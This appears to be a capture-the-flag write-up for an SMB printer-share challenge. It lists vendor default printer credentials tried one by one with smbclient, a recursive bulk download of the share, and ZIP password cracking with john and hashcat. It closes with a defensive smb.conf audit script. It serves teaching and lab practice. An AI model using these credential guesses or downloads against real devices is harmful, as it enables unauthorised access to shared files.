Description
A Secure Printer is now in use. I'm confident no one can leak the message again... or can you?
Setup
Launch the challenge instance and note the host and port.
This is a follow-up to Printer Shares - the server is 'more secure' but still uses SMB.
```bash
sudo apt install smbclient
```
Solution
Step 1: List SMB shares with default credentials
The server now requires credentials. Default printer/MFP credentials are vendor-dependent: HP, Xerox, Canon, Kyocera, Ricoh, and Brother all ship with different documented defaults. Try the common pairs in order, easiest first.
```bash
# Anonymous / guest first - sometimes still allowed:
smbclient -L //<HOST> -p <PORT_FROM_INSTANCE> -N
smbclient -L //<HOST> -p <PORT_FROM_INSTANCE> -U guest%
# Generic admin defaults:
smbclient -L //<HOST> -p <PORT_FROM_INSTANCE> -U admin%admin
smbclient -L //<HOST> -p <PORT_FROM_INSTANCE> -U admin%password
smbclient -L //<HOST> -p <PORT_FROM_INSTANCE> -U admin%
# Vendor-specific defaults:
# HP / HP LaserJet:
smbclient -L //<HOST> -p <PORT_FROM_INSTANCE> -U admin%hpinvent
# Xerox WorkCentre:
smbclient -L //<HOST> -p <PORT_FROM_INSTANCE> -U admin%1111
smbclient -L //<HOST> -p <PORT_FROM_INSTANCE> -U admin%2222
# Canon:
smbclient -L //<HOST> -p <PORT_FROM_INSTANCE> -U ADMIN%canon
smbclient -L //<HOST> -p <PORT_FROM_INSTANCE> -U 7654321%7654321
# Kyocera:
smbclient -L //<HOST> -p <PORT_FROM_INSTANCE> -U Admin%Admin
smbclient -L //<HOST> -p <PORT_FROM_INSTANCE> -U admin00%admin00
# Ricoh:
smbclient -L //<HOST> -p <PORT_FROM_INSTANCE> -U admin%password
# Brother:
smbclient -L //<HOST> -p <PORT_FROM_INSTANCE> -U admin%initpass
# Application-themed:
smbclient -L //<HOST> -p <PORT_FROM_INSTANCE> -U printer%printer
```
Learn more
SMB (Server Message Block) is a network protocol used primarily for file sharing, printer sharing, and network browsing. It's the protocol behind Windows "network shares" (\\server\share) and is also implemented on Linux via Samba. SMB has a long history of critical vulnerabilities - EternalBlue (MS17-010) used by the WannaCry ransomware exploited an SMB buffer overflow to achieve unauthenticated remote code execution.
Default credentials are a pervasive problem in embedded devices, printers, and enterprise equipment. Vendors ship devices with factory-set usernames and passwords (admin/admin, guest/(blank), printer/printer) because it simplifies initial setup. When organisations deploy these devices without changing the defaults, they create trivially accessible entry points.
The `smbclient` syntax for credentials is `-U username%password`. For anonymous (guest) access, `-U guest%` sends "guest" with an empty password, and `-N` skips authentication entirely (null session). Tools like `enum4linux` and `nmap --script smb-enum-shares` automate SMB enumeration more comprehensively.
Step 2: Connect to the share
Connect to the shares directory using the working credentials.
```bash
smbclient //HOST/shares -p PORT -U guest%
```
Learn more
SMB shares have access control lists that can restrict which users can connect and what operations they can perform (read, write, change). In this challenge, the "security" improvement over Printer Shares 1 is requiring authentication - but default printer credentials still grant access, demonstrating that authentication alone doesn't mean security if the credentials are weak or default.
In real SMB audits, after finding valid credentials you enumerate: `smbclient -L` to list all shares (including hidden ones ending in `$`), then connect to each share and run `recurse ON; ls` to recursively list all files. Tools like `smbmap` do this automatically and show read/write permissions per share per user.
The `-p PORT` flag is necessary here because the challenge runs SMB on a non-standard port instead of the default 445 (or 139 for older NetBIOS-over-TCP). In real network reconnaissance, a full port scan (`nmap -p-` or at least `nmap -p 139,445`) is the first step to finding SMB services regardless of port.
Step 3: Navigate and download the flag
Use `recurse ON; ls` inside smbclient to walk every subdirectory at once instead of cd-ing manually. If the flag is inside a password-protected ZIP, crack it offline with zip2john + john.
```bash
# Inside the smbclient prompt:
recurse ON
prompt OFF
ls
# Pull everything in one shot:
mget *
exit
# If you find a password-protected ZIP, crack it:
zip2john secret.zip > zip.hash
john --wordlist=/usr/share/wordlists/rockyou.txt zip.hash
# Or with hashcat (mode 13600 = WinZip):
hashcat -m 13600 -a 0 zip.hash /usr/share/wordlists/rockyou.txt
# Then extract with the cracked password:
unzip -P <password> secret.zip
cat flag.txt
```
Learn more
The `smbclient` interactive shell uses familiar Unix-like commands (`ls`, `cd`, `get`, `put`, `mkdir`) to navigate and transfer files. `get filename` downloads a file to your local current directory. For bulk downloads, `mget *` (with `prompt OFF` to skip confirmation) downloads all files in the current directory.
Hidden shares (ending in `$`) like `ADMIN$`, `C$`, and `IPC$` are administrative shares that require administrator credentials but can reveal a great deal about the system. On Windows, `C$` gives direct access to the C: drive if you have administrator rights - this is why credential theft combined with SMB is so powerful in lateral movement during real attacks.
After downloading files, always verify them with `file` and `strings`. Sometimes flags are embedded in binary files, images, or PDFs rather than plain text files, requiring additional forensic extraction steps. For the SMB recon toolkit see Networking tools for CTF; for offline ZIP/RAR password cracking see Hash cracking for CTF.
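The weakness this challenge chain depends on is a server that still hands its share to guest or default-credential logins. As an added example (not part of the challenge, the writeup, or Samba itself), here is a small audit of a Samba smb.conf that flags the guest-access, null-session and SMB1 settings discussed above; the option names are real Samba parameters, the two sample configs are constructed.

```python
import configparser
# Constructed sample smb.conf fragments (not the challenge server's config).
WEAK_CONF = """
[global]
map to guest = Bad User
server min protocol = NT1
[shares]
guest ok = yes
read only = no
"""
HARDENED_CONF = """
[global]
map to guest = Never
restrict anonymous = 2
server min protocol = SMB3
server signing = mandatory
[shares]
guest ok = no
"""
# (option, Samba's value when unset, predicate meaning "weak", finding text)
GLOBAL_CHECKS = [
    ("map to guest", "Never", lambda v: v != "never",
     "map to guest: failed logins fall back to anonymous guest access"),
    ("restrict anonymous", "0", lambda v: v != "2",
     "restrict anonymous != 2: null sessions can still enumerate shares"),
    ("server min protocol", "SMB2_02", lambda v: v.startswith(("nt1", "lanman", "core")),
     "server min protocol still permits SMB1"),
    ("server signing", "default", lambda v: v != "mandatory",
     "server signing not set to mandatory: sessions are not integrity-protected"),
]
def audit_smb_conf(text: str) -> dict[str, list[str]]:
    """Return {section: [findings]}; an empty dict means nothing was flagged."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)  # INI-like; '%' is literal
    cp.read_string(text)
    findings: dict[str, list[str]] = {}
    g = cp["global"] if cp.has_section("global") else {}
    for opt, fallback, weak, msg in GLOBAL_CHECKS:
        if weak(g.get(opt, fallback).strip().lower()):
            findings.setdefault("global", []).append(msg)
    for share in (n for n in cp.sections() if n != "global"):
        s = cp[share]
        def on(key: str, dflt: str = "no") -> bool:  # Samba booleans: yes/true/1
            return s.get(key, dflt).strip().lower() in ("yes", "true", "1")
        if on("guest ok") or on("public"):  # 'public' is a synonym of 'guest ok'
            notes = ["guest ok: no credentials needed to read the share"]
            if on("writable") or on("writeable") or not on("read only", "yes"):
                notes.append("guest access is also writable")
            findings[share] = notes
    return findings
```

Run it against a real smb.conf with `audit_smb_conf(open("/etc/samba/smb.conf").read())`; the weak sample produces four global findings plus a guest-writable share, the hardened one produces none.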
Flag
picoCTF{pr1nt3r_shar3s_2_...}
The second printer challenge requires authentication - default printer credentials grant access to the flag.